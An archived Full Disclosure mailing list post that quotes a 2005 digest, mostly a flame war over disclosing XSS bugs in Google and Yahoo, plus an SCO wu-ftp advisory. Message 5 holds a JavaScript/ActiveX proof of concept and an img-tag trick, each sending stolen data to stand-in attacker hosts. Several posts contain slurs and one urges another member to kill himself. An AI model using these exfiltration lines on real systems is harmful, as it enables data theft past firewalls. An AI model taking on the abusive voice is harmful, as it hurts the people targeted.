Full Disclosure mailing list archives
RE: RE:DON'T SEND ME AGAIN PLS
From: "Krpata, Tyler" <tkrpata () bjs com>
Date: Wed, 21 Dec 2005 14:39:43 -0500
You need to unsubscribe from the list. I was feeling kind, so I just went and put your email address into the unsubscriber. Just find and reply to the confirmation email and you'll be free from FD forever (or until you accidentally subscribe and then forget you did it again). -----Original Message----- From: Ahmed Aydogan [mailto:jmcboy981 () hotmail com] Sent: Wednesday, December 21, 2005 1:31 PM To: full-disclosure () lists grok org uk Subject: [Full-disclosure] RE:DON'T SEND ME AGAIN PLS DON'T SEND ME AGAIN PLS
From: full-disclosure-request () lists grok org uk Reply-To: full-disclosure () lists grok org uk To: full-disclosure () lists grok org uk Subject: Full-disclosure Digest, Vol 10, Issue 70 Date: Wed, 21 Dec 2005 18:25:14 +0000 (GMT) Send Full-Disclosure mailing list submissions to full-disclosure () lists grok org uk To subscribe or unsubscribe via the World Wide Web, visit https://lists.grok.org.uk/mailman/listinfo/full-disclosure or, via email, send a message with subject or body 'help' to full-disclosure-request () lists grok org uk You can reach the person managing the list at full-disclosure-owner () lists grok org uk When replying, please edit your Subject line so it is more specific than "Re: Contents of Full-Disclosure digest..." Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you. Today's Topics: 1. Re: XSS vulnerabilities in Google.com (Mohit Muthanna) 2. Alternate take on list trolls (womber) 3. Re: XSS vulnerabilities in Google.com (fok yo) 4. Re: XSS vulnerabilities in Google.com (n3td3v) 5. Re: new attack technique? using JavaScript+XML+OWS Post Data (Joachim Schipper) 6. SCOSA-2005.63 OpenServer 5.0.6 OpenServer 5.0.7 OpenServer 6.0.0 : wu-ftp Denial of Service Vulnerability (security () sco com) 7. Re: XSS vulnerabilities in Google.com (GroundZero Security) 8. Re: XSS vulnerabilities in Google.com (n3td3v) 9. RE: XSS vulnerabilities in Google.com (Edward Pearson) 10. Re: XSS vulnerabilities in Google.com (GroundZero Security) 11. Character vulnerabilities (Peer Janssen) 12. Re: XSS vulnerabilities in Google.com (fok yo) 13. [EMED-L] Patriot Act and HIPPA (fwd) (J.A. Terranson) 14. Re: Firewall (The Movie) - http://firewallmovie.warnerbros.com/cmp/trailer.html?id=trailer (Slythers Bro) 15. Re: XSS vulnerabilities in Google.com (n3td3v) 16. Re: SCOSA-2005.63 OpenServer 5.0.6 OpenServer 5.0.7 OpenServer 6.0.0 : wu-ftp Denial of Service Vulnerability (KF (lists)) 17. RE: Character vulnerabilities (wilder_jeff Wilder) 18. Re: XSS vulnerabilities in Google.com (GroundZero Security) 19. Re: XSS vulnerabilities in Google.com (n3td3v) ---------------------------------------------------------------------- Message: 1 Date: Wed, 21 Dec 2005 11:00:11 -0500 From: Mohit Muthanna <mohit.muthanna () gmail com> Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com To: GroundZero Security <fd () g-0 org> Cc: full-disclosure () lists grok org uk Message-ID: <fdb3980a0512210800h13a10f20h83cab9d43942a59c () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 I thought I qualified my response well enough to prevent any ambiguities, but I guess I have to try again.Sure, but "google != howardsblog.com". A large part of the population (including myself) relies on Google's various services for day-to-day use. I sure as hell would not feel comfortable knowing that I'm using a service that can potentially leak my information.i'm not talking about some shitty site that noone knows, but a lof ofbig websites havesuch vulnerabilities.And they should be disclosed. Plain and simple.That's quite a blanket statement to make. I'm sure a few people in the "security community" would like to know that there exists a vulnerability in a Google service.yeah maybe but if we end up posting about every site that offersservices to usersand has xss issues then this list would be reciving a flood of mails :PThat's called full-disclosure. It's the point of this list. It keeps (or attempts to keep) service providers, software companies, and the "security community" on their toes.its not hard to test for xss, so if you are really so afraid of it gotest it yourself andnotify the website owner.I don't have the time for it, nor do I care for it. I rely on this and other lists to keep me informed.No. But a site need not be audited to discover a bug.ah ok so you think illegal activity is the way to go ?Where did you get that impression? Let me rephrase for clarity: No it is not legal. But a bug can be discovered by other means than auditing. Like say, by simply using the service.XSS can do a lot of harm. A compromised administrator account is generally a compromised server. There are some good XSS resources on the web you can read up on.no as they dont rely on /etc/passwd users but have their own databaseusuallyvia mysql or so and a compromised admin user on some webinterface isntalwaysgoing to end up in compromise of the whole server unless the admin isstupidenough to use the same passwords for root and the webbased software.That isn't outside the realm of possibility. Again, you missed my qualifier: "generally". It is quite likely that once a determined hacker has admin priviliges on "some webinterface", he will eventually find a way to own the box. Not "always" but "quite likely". FYI, /etc/passwd is not the only way one can gain root. Larger services don't even use /etc/passwd. There's more than one way to skin a cat.in most cases this will only end up in control of the web parts i.e.some forum.i agree that this is a problem, but its still not resulting in rootaccess on the shell. How do you know? Have you worked with every single web application that exists in the universe? In any case, even if it doesn't result in gaining root, don't you think that it is serious? If an XSS vulnerability was found in Flikr, or del.icio.us, or basecamp, or any other online service, and it lead to "control of the web parts", would you be comfortable using their services? What if they were paid services? Then does is qualify for full-disclosure?oh and i dont have to read about it so keep your sarcasm to yourself.So then you agree that a XSS vulnerability is serious, and should be disclosed.Then, my friend, you have discovered a bug.mhm sure, imagine you find a DoS in your precious google, then you wouldtake themdown and you really belive they would thank you for that ? you would be raided in no time. you think they would belive you that you did it only for a good cause ?yeah right... If I found it during the course of my using the service, sure. Why not? I've developed online services before, and I've had bugs reported. Contrary to what you may think, instead of "calling the feds", I try to fix the problem as soon as I can. I'm also glad it was reported by a user, as opposed to being exploited by a hacker."There are 10 types of people. Those who understand binary, and those who don't."you dont...Very classy. -- Mohit Muthanna [mohit (at) muthanna (uhuh) com] "There are 10 types of people. Those who understand binary, and those who don't." ------------------------------ Message: 2 Date: Wed, 21 Dec 2005 10:13:54 -0600 From: womber <womber () gmail com> Subject: [Full-disclosure] Alternate take on list trolls To: full-disclosure () lists grok org uk Message-ID: <5aad114b0512210813q44a28d0m236471a6251b0652 () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 I know some people have stated they thought a certain list member (to remain nameless) is really someone doing social engineering. Given the type of replies recently it is starting to look to me as this could be possible. The statement "where are your yahoo or google exploits?" which keeps coming up makes me feel like yahoo is too cheep to check their code themselves or pay a firm to check, that they try to stir up security people to check it thoroughly because they can shove it back in a certain members face. It could also be a severe lack of social skills on that persons part. Just thought I would throw that out there, because it would not be unlike a company to avoid paying money if they do not have to. ------------------------------ Message: 3 Date: Wed, 21 Dec 2005 17:15:10 +0100 From: fok yo <yoo.fok () gmail com> Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com To: GroundZero Security <fd () g-0 org> Cc: full-disclosure () lists grok org uk Message-ID: <cd8f1f1e0512210815h145c0796v () mail gmail com> Content-Type: text/plain; charset="iso-8859-1" exactly. n3td3v's nothing but a pose, she's trying to be a respected security researcher, but she hides behind an anonymous nick. What groundbreaking research did n3tf4rt conduct? Nothing, still google has 68K+ hits for n3td3v, waste of bandwidth, storage, time. This is an ongoing pollution which should come to an end. Please nd, KILL yourself, don't even post your suicide note to fd (although that would be the post of the year). I hope google or yahoo sue n3td0rk for reverse engineering their web apps. Jealousy is something for 14yo girls, bitch. 2005/12/21, GroundZero Security <fd () g-0 org>:google or yahoo, google or yahoo ..blah go find some real bugs noone is jealous of you, we just think its redicilous how you try to show off with your non existing skills and reputation. you are the greatest lamer i'v seen on this list sofar. so instead of braging about how great you are, you should actually try and learn about security then soon you will realize that your xss shit is just pathetic and nothing to be proud of. you think finding some simple xss in a website such as yahoo or google makes you superior to everyone else here ? 99% of the people on this list are more skilled than you, thats fact! so stop trying to show off it wont work. code a double free() remote exploit, then i would agree that you have skill. until you do that shut the fuck up kiddie. when i started over 11 years ago, you couldnt even spell the word computer. so please you should finally realize that you are at the wrong place. i mean look around how many people complain about you beeing annoying. oh and if you couldnt figure it out by now, groundzero is my company you little moron. -sk ----- Original Message ----- From: "n3td3v" <xploitable () gmail com> To: "GroundZero Security" <fd () g-0 org>;<full-disclosure () lists grok org ukSent: Wednesday, December 21, 2005 4:26 PM Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.comYour argument for having Google and Yahoo vulnerabilities (especially XSS) banned from FD is very poor. GroundZero or whoever you may be. Please get off the list and stop disrespecting others who do disclose vulnerabilities in Google And Yahoo On 12/21/05, GroundZero Security <fd () g-0 org> wrote:Sure, but "google != howardsblog.com". A large part of thepopulation(including myself) relies on Google's various services forday-to-dayuse. I sure as hell would not feel comfortable knowing that I'musinga service that can potentially leak my information.i'm not talking about some shitty site that noone knows, but a lofofbig websites havesuch vulnerabilities.That's quite a blanket statement to make. I'm sure a few people inthe"security community" would like to know that there exists a vulnerability in a Google service.yeah maybe but if we end up posting about every site that offersservices to usersand has xss issues then this list would be reciving a flood of mails:Pits not hard to test for xss, so if you are really so afraid of itgotest it yourself andnotify the website owner.No. But a site need not be audited to discover a bug.ah ok so you think illegal activity is the way to go ? you cant just audit any site you want you know, but hey if you want to get a visit from the feds why dont you audit somegov/mil i'm surethere are lots of xss to discover :PXSS can do a lot of harm. A compromised administrator account is generally a compromised server. There are some good XSS resourcesonthe web you can read up on.no as they dont rely on /etc/passwd users but have their owndatabaseusuallyvia mysql or so and a compromised admin user on some webinterfaceisntalwaysgoing to end up in compromise of the whole server unless the adminisstupidenough to use the same passwords for root and the webbased software. in most cases this will only end up in control of the web parts i.e.some forum.i agree that this is a problem, but its still not resulting in rootaccess on the shell.oh and i dont have to read about it so keep your sarcasm toyourself.Then, my friend, you have discovered a bug.mhm sure, imagine you find a DoS in your precious google, then youwould take themdown and you really belive they would thank you for that ? you wouldbe raided in no time.you think they would belive you that you did it only for a goodcause? yeah right..."There are 10 types of people. Those who understand binary, andthosewho don't."you dont... _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/-------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051221/93347fab/attachment-0001.html ------------------------------ Message: 4 Date: Wed, 21 Dec 2005 16:21:01 +0000 From: n3td3v <xploitable () gmail com> Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com To: GroundZero Security <fd () g-0 org>, full-disclosure () lists grok org uk Message-ID: <4b6ee9310512210821j7a5e8484l7253cf5de1a159fe () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 On 12/21/05, GroundZero Security <fd () g-0 org> wrote:google or yahoo, google or yahooGoogle and Yahoo is my specialized subject as is corporate security as a whole, don't be suprised if Google and Yahoo come up, they're the biggest of the biggest out there on the landscape.its redicilous how you try to show off with your non existing skills andreputation. you are the greatest lamer You're very sure I don't have any skills?you think finding some simple xss in a website such as yahoo or googlemakes you superior to everyone else here ? You must be thinking thats all I find ;-)99% of the people on this list are more skilled than you, thats fact! sostop trying to show off it wont work. You're not one of them, be off with youcode a double free() remote exploit, then i would agree that you haveskill. until you do that shut the fuck up kiddie. Using profanity against those with more Google and Yahoo vulnerabilities than you won't help you become betterwhen i started over 11 years ago, you couldnt even spell the wordcomputer. so please you should finally realizethat you are at the wrong place. i mean look around how many peoplecomplain about you beeing annoying.oh and if you couldnt figure it out by now, groundzero is my company youlittle moron. 11 years, and hi-jacking legitmate dislclosures like this one? You've learned alot. God forbid you, if you really do own a security company. ------------------------------ Message: 5 Date: Wed, 21 Dec 2005 17:36:04 +0100 From: Joachim Schipper <j.schipper () math uu nl> Subject: Re: [Full-disclosure] new attack technique? using JavaScript+XML+OWS Post Data To: full-disclosure () lists grok org uk Message-ID: <20051221163604.GC23202 () melpomene jschipper dynalias net> Content-Type: text/plain; charset=us-ascii On Wed, Dec 21, 2005 at 08:58:30PM +0530, Gaurav Kumar wrote:While researching COM related security vulnerabilities I thought of this possible attack technique, not sure if it has been discussed before. Problem/challenge statement: A Trojan has been to be placed in a system running an application firewall like Zone Alarm Pro etc. The Trojan is not allowed to make any outbound connections. The challenge is to send data (key logged passwords etc) back to the attacker.Solution The Trojan can be designed to generate an xml file which will contain the data to be sent out. The attacker will lure the user to visit a website hosted by him. The site can have following HTML code- <html> <body> The author is not responsible for any misuse, this PoC is for educational purpose only. <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}" id="exp"> </object> <script LANGUAGE=javascript> var xmlDoc xmlDoc = new ActiveXObject("Microsoft.XMLDOM"); xmlDoc.async=false; xmlDoc.load("c:\\note.xml"); xmlObj=xmlDoc.documentElement; var a= xmlObj.firstChild.text; exp.Post(0,"http://www.attackersite.com/input.asp",a); </script> </body> </html> Content of note.xml could be ? <password>secret</password> The above code (works well on windows XP SP2) essentials calls "OWS Post Data" COM control to post the contents of note.xml (generated by trojan) to attackersite.com Essentially, the technique is breaking the basic functionality of application firewalls by using OWS Post Data as bridge for sending out the data using Javascript and XML.flames/spam/abuse etc can be sent to spam () securebox org comments can be sent to gaurav () securebox orgI'll just assume you read the list. I'm not an expert, but I don't recall ever seeing this particular implementation. Then again, there are easier ways to go about this - for instance, how about embedding a <img src="http://evil.hacker.com/callback/ThisIsMyVerySecretPassWord"; width=1 height=1> tag into an arbitrary HTML file? It works on any graphical browser without special protection. Search the archives for some more neat tricks - calling the proper APIs, IE can be used to send out pretty much arbitrary data. [1] If you're willing to attack ZA specifically (instead of a generic application/-based firewall, of which there are many) just use the Windows API to generate the proper mouse clicks/keypresses. Joachim [1] Some would say that, calling the 'proper' APIs, IE can be used to send *in* pretty much arbitrary data too. I'd be inclined to agree. ------------------------------ Message: 6 Date: Wed, 21 Dec 2005 11:34:42 -0500 (EST) From: security () sco com Subject: [Full-disclosure] SCOSA-2005.63 OpenServer 5.0.6 OpenServer 5.0.7 OpenServer 6.0.0 : wu-ftp Denial of Service Vulnerability To: security-announce () list sco com Message-ID: <Pine.UW2.4.63.0512211134040.11687 () gold nj sco com> Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ______________________________________________________________________________ SCO Security Advisory Subject: OpenServer 5.0.6 OpenServer 5.0.7 OpenServer 6.0.0 : wu-ftp Denial of Service Vulnerability Advisory number: SCOSA-2005.63 Issue date: 2005 December 21 Cross reference: sr893936 fz532335 erg712856 sr895049 fz533027 erg712952 CVE-2005-0256 ______________________________________________________________________________ 1. Problem Description The wu_fnmatch function in wu_fnmatch.c allows remote attackers to cause a denial of service (CPU exhaustion by recursion) via a glob pattern with a large number of * (wildcard) characters, as demonstrated using the dir command. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the following name CVE-2005-0256 to this issue. 2. Vulnerable Supported Versions System Binaries ---------------------------------------------------------------------- OpenServer 5.0.6 /etc/ftpd OpenServer 5.0.7 /etc/ftpd OpenServer 6.0.0 /etc/ftpd 3. Solution The proper solution is to install the latest packages. 4. OpenServer 5.0.6 4.1 Location of Fixed Binaries ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.63 4.2 Verification MD5 (p532335.506_vol.tar) = 89ea2ed1f88da6721bd73c3889f9ac0c md5 is available for download from ftp://ftp.sco.com/pub/security/tools 4.3 Installing Fixed Binaries The following package should be installed on your system before you install this fix: OSS646C Upgrade the affected binaries with the following sequence: 1) Download p532335.506_vol.tar to a directory. 2) Extract VOL* files. # tar xvf p532335.506_vol.tar 3) Run the custom command, specify an install from media images, and specify the directory as the location of the images. 5. OpenServer 5.0.7 5.1 Location of Fixed Binaries The fixes are only available in SCO OpenServer Release 5.0.7 Maintenance Pack 4 or later. ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4_vol.tar 5.2 Verification MD5 (osr507mp4_vol.tar) = 4c87d840ff5b43221258547d19030228 md5 is available for download from ftp://ftp.sco.com/pub/security/tools 5.3 Installing Fixed Binaries See the SCO OpenServer Release 5.0.7 Maintenance Pack 4 Release and Installation Notes: ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm 6. OpenServer 6.0.0 6.1 Location of Fixed Binaries ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.63 6.2 Verification MD5 (p533027.600_vol.tar) = d939cb729d115c9bef2d2032903f2125 md5 is available for download from ftp://ftp.sco.com/pub/security/tools 6.3 Installing Fixed Binaries Upgrade the affected binaries with the following sequence: 1) Download p533027.600_vol.tar to a directory. 2) Extract VOL* files. # tar xvf p533027.600_vol.tar 3) Run the custom command, specify an install from media images, and specify the directory as the location of the images. 7. References Specific references for this advisory: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0256 http://www.idefense.com/application/poi/display?id=207&type=vulnerabilities SCO security resources: http://www.sco.com/support/security/index.html SCO security advisories via email http://www.sco.com/support/forums/security.html This security fix closes SCO incidents sr893936 fz532335 erg712856 sr895049 fz533027 erg712952. 8. Disclaimer SCO is not responsible for the misuse of any of the information we provide on this website and/or through our security advisories. Our advisories are a service to our customers intended to promote secure installation and use of SCO products. 9. Acknowledgments SCO would like to thank Adam Zabrocki. ______________________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (UnixWare) iD8DBQFDqYDTaqoBO7ipriERAtzOAJ0ctD8xRYQrLkkgyHsMqCvfQdPBFQCeIgx7 xqqmzQCNiw6t+WtSL5rqo4E= =ha4X -----END PGP SIGNATURE----- ------------------------------ Message: 7 Date: Wed, 21 Dec 2005 17:57:31 +0100 From: "GroundZero Security" <fd () g-0 org> Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com To: "php0t" <php0t () zorro hu> Cc: full-disclosure () lists grok org uk Message-ID: <017001c6064f$a4617030$0100a8c0@nuclearwinter> Content-Type: text/plain; charset="iso-8859-1" yes you are right, but its like if noone tells him what a stupid fag he is, he will keep posting and posting his irrelevant crap and just ignore the tons of private mail he receives. i'm sorry for adding to the noise, but its just too tempting. i try to ignore it. but i cant promise i will, the last mail he sent just asks for a reply :P but ok...must...resist..... btw my name is not groundzero, thats my company :) greetz -sk Http://www.groundzero-security.com ----- Original Message ----- From: "php0t" <php0t () zorro hu> To: "'GroundZero Security'" <fd () g-0 org> Sent: Wednesday, December 21, 2005 5:06 PM Subject: RE: [Full-disclosure] XSS vulnerabilities in Google.comhi, groundzero. I agree whole heartedly and the dood pisses me off too, just like everybody else. On the other hand, seeing him repeat google/yahoo again and again all the time and seeing the obvious-to-come replies makes my email alert fuck the mp3's up I'm listening to too often. My idea is this: how'bout each time the guy posts something ridiculous, all of us who are grasping our heads tearing our last pieces of hair out thniking to ourselves 'omfgwtfd00d' just write him a private email containing talk-to-the-hand or something? This would achieve two things: 1) less noise on the list 2) instead of being able to reply endlessly with bullcrap to the thread, he would just have to deal with nobody giving a fuck about him in public, still 10 emails saying 'I don't care' whenever he makes a post. Tell me if you think this sucks, it's just an idea. Php0t -----Original Message----- From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of GroundZero Security Sent: Wednesday, December 21, 2005 4:54 PM To: n3td3v Cc: full-disclosure () lists grok org uk Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com google or yahoo, google or yahoo ..blah go find some real bugs noone is jealous of you, we just think its redicilous how you try to show off with your non existing skills and reputation. you are the greatest lamer i'v seen on this list sofar. so instead of braging about how great you are, you should actually try and learn about security then soon you will realize that your xss shit is just pathetic and nothing to be proud of. you think finding some simple xss in a website such as yahoo or google makes you superior to everyone else here ? 99% of the people on this list are more skilled than you, thats fact! so stop trying to show off it wont work. code a double free() remote exploit, then i would agree that you have skill. until you do that shut the fuck up kiddie. when i started over 11 years ago, you couldnt even spell the word computer. so please you should finally realize that you are at the wrong place. i mean look around how many people complain about you beeing annoying. oh and if you couldnt figure it out by now, groundzero is my company you little moron. -sk ----- Original Message ----- From: "n3td3v" <xploitable () gmail com> To: "GroundZero Security" <fd () g-0 org>; <full-disclosure () lists grok org uk> Sent: Wednesday, December 21, 2005 4:26 PM Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.comYour argument for having Google and Yahoo vulnerabilities (especially XSS) banned from FD is very poor. GroundZero or whoever you may be. Please get off the list and stop disrespecting others who do disclose vulnerabilities in Google And Yahoo On 12/21/05, GroundZero Security <fd () g-0 org> wrote:Sure, but "google != howardsblog.com". A large part of the population (including myself) relies on Google's various services for day-to-day use. I sure as hell would not feel comfortable knowing that I'm using a service that can potentially leak my information.i'm not talking about some shitty site that noone knows, but a lof of big websites have such vulnerabilities.That's quite a blanket statement to make. I'm sure a few people inthe "security community" would like to know that there exists a vulnerability in a Google service.yeah maybe but if we end up posting about every site that offers services to users and has xss issues then this list would be reciving a flood of mails :P its not hard to test for xss, so if youare really so afraid of it go test it yourself and notify the website owner.No. But a site need not be audited to discover a bug.ah ok so you think illegal activity is the way to go ? you cant just audit any site you want you know, but hey if you want to get a visit from the feds why dont you audit some gov/mil i'm sure there are lots of xss to discover :PXSS can do a lot of harm. A compromised administrator account is generally a compromised server. There are some good XSS resources on the web you can read up on.no as they dont rely on /etc/passwd users but have their own database usually via mysql or so and a compromised admin user on some webinterface isnt always going to end up in compromise of the whole server unless the admin is stupid enough to use the same passwords for root and the webbased software. in most cases this will only end up in control of the web parts i.e. some forum. i agree that this is a problem, but its still not resulting in root access on the shell. oh and i dont have to read about it so keep your sarcasm to yourself.Then, my friend, you have discovered a bug.mhm sure, imagine you find a DoS in your precious google, then you would take them down and you really belive they would thank you for that ? you would be raided in no time. you think they would belive you that you did it only for a good cause ? yeah right..."There are 10 types of people. Those who understand binary, and those who don't."you dont... _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/------------------------------ Message: 8 Date: Wed, 21 Dec 2005 17:16:54 +0000 From: n3td3v <xploitable () gmail com> Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com To: GroundZero Security <fd () g-0 org>, full-disclosure () lists grok org uk Message-ID: <4b6ee9310512210916h66104d21n484173a514c0d57e () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 You trolled this thread by saying Watchfire should stop disclosing vulnerabilities for Yahoo and Google. You get the response you deserved to get. Now you're running off the thread now with your tail between your legs, because everyone has told you that Google and Yahoo vulnerabilities (especially XSS) will never be banned from FD. On 12/21/05, GroundZero Security <fd () g-0 org> wrote:yes you are right, but its like if noone tells him what a stupid fag heis,he will keep posting and posting his irrelevant crap and just ignore thetons of privatemail he receives. i'm sorry for adding to the noise, but its just tootempting.i try to ignore it. but i cant promise i will, the last mail he sentjust asks for a reply :Pbut ok...must...resist..... btw my name is not groundzero, thats my company :) greetz -sk------------------------------ Message: 9 Date: Wed, 21 Dec 2005 17:41:14 -0000 From: "Edward Pearson" <Ed () unitymail co uk> Subject: RE: [Full-disclosure] XSS vulnerabilities in Google.com To: <full-disclosure () lists grok org uk> Message-ID: <4DB4124FD67F9745B9E09DADDC297467724292@unitydc.unity1.local> Content-Type: text/plain; charset="us-ascii" Why has this become a trolling? "if noone tell him what a stupid fag he is" Are we back at fucking middle school? Have we decended to the level of 10 year olds?? Ground Zero, I've seen your company website(s) and your products. All I say is I think you have several very good resons to pay FUCKING close attention to what is said on this list. Work it out. The only people who seem hell bent on ruining this list for everyone are: InfoSecBOFH n3td3v Ground Zero Security None of these people have anything to bring to the table. Lets see at least one real vuln report/exploit from one of you, and then the other two have to concentrate on growing up enough to not troll it or make stupid pre-school comments. Come on guys!!! I'm beginning to thing that actually you're not bigger than this... Ultimatly, if you've got problems with each other, do it on MSN, AIM, IRC, USENET whatever, just not my inbox. Have a fucking excellent day. - Ed (BTW, Ground Zero's has my alais since 1995, now I see that this chump is going round putting a black mark by it) -----Original Message-----e From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of n3td3v Sent: 21 December 2005 17:17 To: GroundZero Security; full-disclosure () lists grok org uk Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com You trolled this thread by saying Watchfire should stop disclosing vulnerabilities for Yahoo and Google. You get the response you deserved to get. Now you're running off the thread now with your tail between your legs, because everyone has told you that Google and Yahoo vulnerabilities (especially XSS) will never be banned from FD. On 12/21/05, GroundZero Security <fd () g-0 org> wrote:yes you are right, but its like if noone tells him what a stupid fag he is, he will keep posting and posting his irrelevant crap and just ignore the tons of private mail he receives. i'm sorry for adding tothe noise, but its just too tempting.i try to ignore it. but i cant promise i will, the last mail he sent just asks for a reply :P but ok...must...resist..... btw my name is not groundzero, thats my company :) greetz -sk_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ------------------------------ Message: 10 Date: Wed, 21 Dec 2005 18:39:31 +0100 From: "GroundZero Security" <fd () g-0 org> Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com To: "n3td3v" <xploitable () gmail com> Cc: full-disclosure () lists grok org uk Message-ID: <017701c60655$8263e750$0100a8c0@nuclearwinter> Content-Type: text/plain; charset="iso-8859-1" lol you wont ever give up kiddie dont you ? i do not care about google and yahoo vulnerabilities. i agree to leave you alone, but you ask for it again and again so be it. 1 person said its ok for the xss vuln. you cant even count or did you see any other mails ? how about the tons of people the constantly tell you to shut the fuck up since we are all tired of you. you say the same shit over and over again. if someone tells you facts then you ignore it, because you have no other arguments as that someone else wouldnt have found lame xss bugs in google or yahoo and therefore they shouldnt be allowed on this list. you are the last person to even dare to say something like this. you have nothing else to say then that people would be jealous of you or how precious your lame xss bugs are. noone cares about your shitty vulnerabilities you found as it doesnt require any skill at all to find those. show us some code! how many exploits did you write ? you are so blinded by your ego that you dont realize how much crap you talk and how you destory your imaginary reputation yourself. why do you think there have been so many mails against you? its not because of your xss lameness. if you would have simply provided them to the list noone would have bothered, but you have to brag how special they would make you. then you think you would be one of the most respected security researchers out there, but noone knows you. you are so pathetic its unbeliveable. pull the stick out of your ass and get lost kid. ----- Original Message ----- From: "n3td3v" <xploitable () gmail com> To: "GroundZero Security" <fd () g-0 org>; <full-disclosure () lists grok org uk> Sent: Wednesday, December 21, 2005 6:16 PM Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.comYou trolled this thread by saying Watchfire should stop disclosing vulnerabilities for Yahoo and Google. You get the response you deserved to get. Now you're running off the thread now with your tail between your legs, because everyone has told you that Google and Yahoo vulnerabilities (especially XSS) will never be banned from FD. On 12/21/05, GroundZero Security <fd () g-0 org> wrote:yes you are right, but its like if noone tells him what a stupid faghe is,he will keep posting and posting his irrelevant crap and just ignorethe tons of privatemail he receives. i'm sorry for adding to the noise, but its just tootempting.i try to ignore it. but i cant promise i will, the last mail he sentjust asks for a reply :Pbut ok...must...resist..... btw my name is not groundzero, thats my company :) greetz -sk------------------------------ Message: 11 Date: Wed, 21 Dec 2005 18:47:42 +0100 From: Peer Janssen <peer () baden-online de> Subject: [Full-disclosure] Character vulnerabilities To: full-disclosure () lists grok org uk Message-ID: <43A9953E.4020502 () baden-online de> Content-Type: text/plain; charset=us-ascii; format=flowed Hi list, I read so many postings on this list of people who seemingly do not control their anger, fury etc. which seems to bump their heads straight at their ceilings. Do you really consider this as qualities of a security researcher/consultant/employee/...? I'd rather consider them vulnerabilities which might expose them to social engineering attacks or to being blinded by their own rage, which can easily result in destructive carelessness in many areas. I don't think that it makes a good publicity for a company to work with security people not mastering themselves. Why would you entrust them with your systems if they react so emotionally? Shouldn't they rather be clear-minded, rational, controlling themselves, etc., when dealing in any way with security issues? So please, do yourself and those around you a favor and change; you CAN do it, and you will make everybody happier, and youself more efficient, if happyness is not your thing. So cheer up, and take it a bit more easily! Peer ------------------------------ Message: 12 Date: Wed, 21 Dec 2005 18:48:52 +0100 From: fok yo <yoo.fok () gmail com> Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com To: n3td3v <xploitable () gmail com> Cc: full-disclosure () lists grok org uk Message-ID: <cd8f1f1e0512210948t3abdd6a8o () mail gmail com> Content-Type: text/plain; charset="iso-8859-1" You just don't get it, do you.... The problem isn't xss bugs are the uberlamest, the problem is you reserve yourself the right to _spam_ us 24/7 by bragging about how once you found a half-ass xss yourself. Your signal to noise ratio is simply too low to be bearable. YOU HAVEN'T ADDED ANY *INTERESTING* SECURITY RELATED CONTENT TO THE LIST, EVER. YOU ARE USELESS TO THE SECURITY COMMUNITY AS A WHOLE. STOP REPLYING TO FD BECAUSE YOU ANNOY 99,99% OF US. WE DON'T NEED ANOTHER WANNABE. YOU WASTE OUR TIME. + you are __very stupid__, you obviously lack the insight to be the top notch security pro you think you are, try something else, it's just not worth it, piece of fuckup. + what's your real name? Stop hiding behind a nick and step into the ligths.... +According to the way you express yourself through email (very simple language/grammar, especially for a native english speaker, bragging and trying to prove yourself without valid arguments, not going to the core of a discussion but trying to hide yourself after the image you think you created, ... ) , it's obvious you lack any social skills, stop wasting your time in front of the computer, find a date for new year's eve, coz it'll be cold and lonely. 2005/12/21, n3td3v <xploitable () gmail com>:You trolled this thread by saying Watchfire should stop disclosing vulnerabilities for Yahoo and Google. You get the response you deserved to get. Now you're running off the thread now with your tail between your legs, because everyone has told you that Google and Yahoo vulnerabilities (especially XSS) will never be banned from FD. On 12/21/05, GroundZero Security <fd () g-0 org> wrote:yes you are right, but its like if noone tells him what a stupid fagheis,he will keep posting and posting his irrelevant crap and just ignorethetons of privatemail he receives. i'm sorry for adding to the noise, but its just tootempting.i try to ignore it. but i cant promise i will, the last mail he sentjust asks for a reply :Pbut ok...must...resist..... btw my name is not groundzero, thats my company :) greetz -sk_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - 